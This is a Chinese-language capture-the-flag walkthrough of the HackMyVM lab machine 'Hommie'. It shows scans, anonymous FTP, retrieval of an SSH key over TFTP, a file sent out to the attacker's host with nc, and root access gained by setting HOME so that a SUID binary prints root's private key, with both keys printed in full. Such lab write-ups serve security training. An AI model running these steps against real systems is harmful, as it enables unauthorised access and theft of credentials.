7.Hommie
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=Hommie
作者:sml
难度:⭐️⭐️
知识点:TFTP服务、环境变量修改、
2. 1.信息收集
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.9.9 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 17:09 CST
Nmap scan report for 192.168.9.9
Host is up (0.00053s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:91:0D:AD (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds
先看下网站
提示我们他的 私钥泄露了。那我估计就是用他的私钥去ssh靶机了
先扫一波网站目录
啥也没有
3. 2.FTP匿名登录
开放了ftp服务。可能存在ftp匿名登录 尝试连接一下
┌──(root㉿kali)-[/home/kali]
└─# ftp 192.168.9.9
Connected to 192.168.9.9.
220 (vsFTPd 3.0.3)
Name (192.168.9.9:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||45506|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
ftp> get index.html
local: index.html remote: index.html
229 Entering Extended Passive Mode (|||13697|)
150 Opening BINARY mode data connection for index.html (0 bytes).
0 0.00 KiB/s
226 Transfer complete.
ftp> ls -a
229 Entering Extended Passive Mode (|||39331|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
drwxrwxr-x 2 0 113 4096 Sep 30 2020 .web
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
根目录下有一个index.html 里面是空的
还有一个隐藏目录.web
里面是真正的index.html
ftp> ls -a
229 Entering Extended Passive Mode (|||6919|)
150 Here comes the directory listing.
drwxrwxr-x 2 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
-rw-r--r-- 1 0 0 99 Sep 30 2020 index.html
226 Directory send OK.
ftp> get index.html
local: index.html remote: index.html
229 Entering Extended Passive Mode (|||64608|)
150 Opening BINARY mode data connection for index.html (99 bytes).
100% |\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*| 99 1.81 MiB/s 00:00 ETA
226 Transfer complete.
99 bytes received in 00:00 (85.93 KiB/s)
发现其内容就是这个网站首页的内容
那么大概率.web目录就是网站的根目录了。传一个马上去
上传后访问发现不能对php进行解析。可能是目录限制
我们新建一个目录,发现命令也收到了限制。那这里我们应该要换一条路了
4. 3.UDP扫描
对靶机进行udp扫描
──(root㉿kali)-[/home/kali]
└─# nmap -sU 192.168.9.9 -p 1-100 //限制端口 Udp扫的很慢
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 17:52 CST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 52.80% done; ETC: 17:54 (0:00:37 remaining)
Stats: 0:01:13 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 67.80% done; ETC: 17:54 (0:00:32 remaining)
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 68.80% done; ETC: 17:54 (0:00:31 remaining)
Stats: 0:01:42 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 91.30% done; ETC: 17:54 (0:00:09 remaining)
Nmap scan report for 192.168.9.9
Host is up (0.00056s latency).
Not shown: 98 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 08:00:27:91:0D:AD (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 124.69 seconds
5. 4.tftp连接
可以发现开启了tftp服务,TFTP 没有身份验证机制,且不加密传输
利用tftp连接服务器
tftp 192.168.9.9
get id\_rsa //猜测这里有私钥
利用下载的私钥连接
chmod 600 id\_rsa
ssh -i id\_rsa alexia@192.168.9.9
6. 5.提权
alexia@hommie:~$ find / -perm -4000 2>/dev/null
/opt/showMetheKey
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount
alexia@hommie:~$ sudo -l
-bash: sudo: command not found
lexia@hommie:/opt$ ./showMetheKey
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEApwUR2Pvdhsu1RGG0UIWmj2yDNvs+4VLPG0WWisip6oZrjMjJ40h7
V0zdgZSRFhMxx0/E6ilh2MiMbpAuogCqC3MEodzIzHYAJyK4z/lIqUNdHJbgLDyaY26G0y
Rn1XI+RqLi5NUHBPyiWEuQUEZCMOqi5lS1kaiNHmVqx+rlEs6ZUq7Z6lzYs7da3XcFGuOT
gCnBh1Wb4m4e14yF+Syn4wQVh1u/53XGmeB/ClcdAbSKoJswjI1JqCCkxudwRMUYjq309j
QMxa7bbxaJbkb3hLmMuFU7RGEPu7spLvzRwGAzCuU3f60qJVTp65pzFf3x51j3YAMI+ZBq
kyNE1y12swAAA8i6ZpNpumaTaQAAAAdzc2gtcnNhAAABAQCnBRHY+92Gy7VEYbRQhaaPbI
M2+z7hUs8bRZaKyKnqhmuMyMnjSHtXTN2BlJEWEzHHT8TqKWHYyIxukC6iAKoLcwSh3MjM
dgAnIrjP+UipQ10cluAsPJpjbobTJGfVcj5GouLk1QcE/KJYS5BQRkIw6qLmVLWRqI0eZW
rH6uUSzplSrtnqXNizt1rddwUa45OAKcGHVZvibh7XjIX5LKfjBBWHW7/ndcaZ4H8KVx0B
tIqgmzCMjUmoIKTG53BExRiOrfT2NAzFrttvFoluRveEuYy4VTtEYQ+7uyku/NHAYDMK5T
d/rSolVOnrmnMV/fHnWPdgAwj5kGqTI0TXLXazAAAAAwEAAQAAAQBhD7sthEFbAqtXEAi/
+suu8frXSu9h9sPRL4GrKa5FUtTRviZFZWv4cf0QPwyJ7aGyGJNxGZd5aiLiZfwTvZsUiE
Ua47n1yGWSWMVaZ55ob3N/F9czHg0C18qWjcOh8YBrgGGnZn1r0n1uHovBevMghlsgy/2w
pmlMTtfdUo7JfEKbZmsz3auih2/64rmVp3r0YyGrvOpWuV7spnzPNAFUCjPTwgE2RpBVtk
WeiQtF8IedoMqitUsJU9ephyYqvjRemEugkqkALBJt91yBBO6ilulD8Xv1RBsVHUttE/Jz
bu4XlJXVeD10ooFofrsZd/9Ydz4fx49GwtjYnqsda0rBAAAAgGbx1tdwaTPYdEfuK1kBhu
3ln3QHVx3ZkZ7tNQFxxEjYjIPUQcFFoNBQpIUNOhLCphB8agrhcke5+aq5z2nMdXUJ3DO6
0boB4mWSMml6aGpW4AfcDFTybT6V8pwZcThS9FL3K2JmlZbgPlhkX5fyOmh14/i5ti7r9z
HlBkwMfJJPAAAAgQDPt0ouxdkG1kDNhGbGuHSMAsPibivXEB7/wK7XHTwtQZ7cCQTVqbbs
y6FqG0oSaSz4m2DfWSRZc30351lU4ZEoHJmlL8Ul6yvCjMOnzUzkhrIen131h/MStsQYtY
OZgwwdcG2+N7MReMpbDA9FSHLtHoMLUcxShLSX3ccIoWxqAwAAAIEAzdgK1iwvZkOOtM08
QPaLXRINjIKwVdmOk3Q7vFhFRoman0JeyUbEd0qlcXjFzo02MBlBadh+XlsDUqZSWo7gpp
ivFRbnEu2sy02CHilIJ6vXCQnuaflapCNG8MlG5CtpqfyVoYQ3N3d0PfOWLaB13fGeV/wN
0x2HyroKtB+OeZEAAAANYWxleGlhQGhvbW1pZQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
alexia@hommie:/opt$
这里给了一个私钥,经过验证这个就是alexia用户的
我们看逆向分析一下这个程序
nc -lp 1234 >showmethekey //kali执行
nc 192.168.9.3 1234 < showMetheKey //靶机执行
读取环境变量中的Home 对应的私钥
那我们修改当前环境变量为我们想要获取私钥的用户即可
alexia@hommie:/opt$ export HOME=/root
alexia@hommie:/opt$ ./showMetheKey
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAvBYog1I3rTTmtMw6i7oPRYy7yj8N6zNT3K9QhalnaTF+Md5NjbX5
hhNfZjO0tNbMGEeJtNTc3FpYWcAujrrd3jO5MzHUWAxQoyYYrZOFj2I5Fz/0RxD7e89H11
5nT7+CSUeddP/UeoyvSPgaruwrwD+dUl7+GiXo3sc5vsq3YufTYh1MlMKb/m7KmVk5n4Tk
/IFJwuuc3U4OZiRwXOmK4W2Gfo0Fonu6vFYmhpcCsi7V8g3hpVmOZIU8ZUtG1YbutCVbOC
EGyc1p5nbnyC0IIF5Y2EhjeevX8gmj4Kdv/y6yuvNdsJKm+ed2EEY9AymmPPwIpQshFwKz
Y0yB8N1jkQAAA8BiCyR9YgskfQAAAAdzc2gtcnNhAAABAQC8FiiDUjetNOa0zDqLug9FjL
vKPw3rM1Pcr1CFqWdpMX4x3k2NtfmGE19mM7S01swYR4m01NzcWlhZwC6Out3eM7kzMdRY
DFCjJhitk4WPYjkXP/RHEPt7z0fXXmdPv4JJR510/9R6jK9I+Bqu7CvAP51SXv4aJejexz
m+yrdi59NiHUyUwpv+bsqZWTmfhOT8gUnC65zdTg5mJHBc6YrhbYZ+jQWie7q8ViaGlwKy
LtXyDeGlWY5khTxlS0bVhu60JVs4IQbJzWnmdufILQggXljYSGN569fyCaPgp2//LrK681
2wkqb553YQRj0DKaY8/AilCyEXArNjTIHw3WORAAAAAwEAAQAAAQA/OvPDshAlmnM0tLO5
5YLczsMS6r+zIj4/InDffmPVaV4TRbisu1B3Umvv39IQOWXDg8k3kZfuPDEXexQrx4Zu/N
R18XqBXyJ8toH1WHK+ETdAKa/ldEAXD0gHjyUMGkWifQDiJF86E7GZxk6yH5NVvg0Vc/nY
sIXo3vD6wwuDo/gj+u4RRYMH3NYkLSj/O67cxGXnTOZPGzGsFTrE218BNtNqbRBR9/immU
irjugqebxY135Z4oECe/Hv4mP2e7n5QVO8FnYklQ4YU6y0ZTAMtjZCAhslXSKvaJPLjXuk
/HpdYhSoojm3vTAq/NT/oir0wA2ZYGdnF/Bxm6v/mntBAAAAgF2pqZEe9UqzcsAfOujr6z
DMRgPpl8qsdhDz6aftdg24AYmgXJ1D7PWUDpU6puO3VxJGrOwvcgD6xELRTxeFjd/2ssrh
4OO/kTvK4K0WVB/bnZ4y724iLcThfHDbzTTc5ckn45tyso8540iKha5ay1i24GwRPWddie
B/qcB1bHNOAAAAgQDmmptuwTRwUSiU1NtZRnJFvxvzLw6Wy/Cb2G+n5KY0ce5cYHT2HSIr
zsbPaDXQNBFy4iu1DAXAJJXTrxjOaAeLVYSb/8eZ1dhcgkxoAC8i2l6NwNmsjhGQKv++fV
qMfIdzVmriLXBZf7DU97YZeDIOrdOOV5CHhq+37i4xNdK18wAAAIEA0Mzc8HYvrXk4ecyi
KXP5u2Zxw2LADJ8DFeKWZmCUuNKFD1TuqdauxKxIVKVDaHvcnEr1bOiEBBso/X1CCtKjE+
12ZOWvqZ4fORxiNs9n/9YxlUSDAw7kyKd9H7dRRFdtb80OgDiwf18tDlEdboGWm/DR0NPq
gmxzbd40GES6DWsAAAALcm9vdEBob21taWU=
-----END OPENSSH PRIVATE KEY-----
复制写入私钥然后连接root
vi id\_rsa
chmod 600 id\_rsa
ssh -i id\_rsa root@127.0.0.1
